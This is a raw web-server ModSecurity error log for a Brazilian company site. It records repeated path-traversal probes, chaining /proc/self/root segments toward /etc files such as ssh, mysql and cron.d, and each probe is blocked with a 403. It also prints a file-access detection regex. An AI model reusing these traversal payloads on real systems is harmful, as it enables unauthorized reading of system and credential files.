https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:17:35.335750 2026] [:error] [pid 21806:tid 140411632822016] [client 74.7.243.203:48330] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/aliases"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgfD9SswJuvopo3lOhbtwAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:17:38.902323 2026] [:error] [pid 21533:tid 140411641214720] [client 74.7.243.203:33286] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgfEnjZBu2q05ozVU9VPgAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:19:14.442889 2026] [:error] [pid 21805:tid 140411624429312] [client 74.7.243.203:38460] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgfcrABkC4fWIHEf8HojQAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:19:27.263054 2026] [:error] [pid 11972:tid 140411649607424] [client 74.7.243.203:34306] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgff5qj1wV0Si-OkefqywAAAAs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:19:37.685281 2026] [:error] [pid 21805:tid 140411658000128] [client 74.7.243.203:45188] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgfibABkC4fWIHEf8HolQAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:19:56.831378 2026] [:error] [pid 32654:tid 140411565680384] [client 74.7.243.203:54214] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgfnAlT9VtDQc7bgUyujgAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:20:25.958345 2026] [:error] [pid 10709:tid 140411725141760] [client 74.7.243.203:55224] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgfuRXjF1vJNtV6CWrzsgAAAcI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:20:27.504601 2026] [:error] [pid 11972:tid 140411616036608] [client 74.7.243.203:54334] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgfu5qj1wV0Si-Okefq1QAAAA8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:20:35.925472 2026] [:error] [pid 21946:tid 140411691570944] [client 74.7.243.203:54336] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgfw3bQATo66fKoS7xNNgAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:21:27.867144 2026] [:error] [pid 21946:tid 140411699963648] [client 74.7.228.16:56850] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgf93bQATo66fKoS7xNPAAAAMU"]
[Mon Mar 16 12:22:18.091447 2026] [:error] [pid 21533:tid 140411624429312] [client 74.7.243.203:44924] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggKnjZBu2q05ozVU9VwwAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:22:22.963356 2026] [:error] [pid 21533:tid 140411590858496] [client 74.7.243.203:35240] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggLnjZBu2q05ozVU9VyAAAAVI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:22:29.700199 2026] [:error] [pid 32654:tid 140411607643904] [client 74.7.243.203:57034] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggNQlT9VtDQc7bgUyuqAAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:23:03.695865 2026] [:error] [pid 32654:tid 140411683178240] [client 74.7.243.203:48326] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggVwlT9VtDQc7bgUyuywAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:23:09.199243 2026] [:error] [pid 21533:tid 140411590858496] [client 74.7.243.203:60620] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggXXjZBu2q05ozVU9V1QAAAVI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:23:11.856246 2026] [:error] [pid 11972:tid 140411716749056] [client 74.7.243.203:37268] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggXpqj1wV0Si-OkefrYgAAAAM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:23:13.194265 2026] [:error] [pid 32654:tid 140411607643904] [client 74.7.243.203:37280] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggYQlT9VtDQc7bgUyuzgAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:23:14.578269 2026] [:error] [pid 21946:tid 140411674785536] [client 74.7.243.203:37294] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggYnbQATo66fKoS7xNTgAAAMg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:23:15.963707 2026] [:error] [pid 21533:tid 140411725141760] [client 74.7.243.203:37308] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggY3jZBu2q05ozVU9V1gAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:23:17.307733 2026] [:error] [pid 10772:tid 140411632822016] [client 74.7.243.203:37312] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggZf9ocpUE4ed4uDzsTgAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:23:18.476310 2026] [:error] [pid 10709:tid 140411590858496] [client 74.7.243.203:37320] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggZhXjF1vJNtV6CWrzyAAAAdI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:23:20.852379 2026] [:error] [pid 21805:tid 140411557287680] [client 74.7.243.203:37334] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id 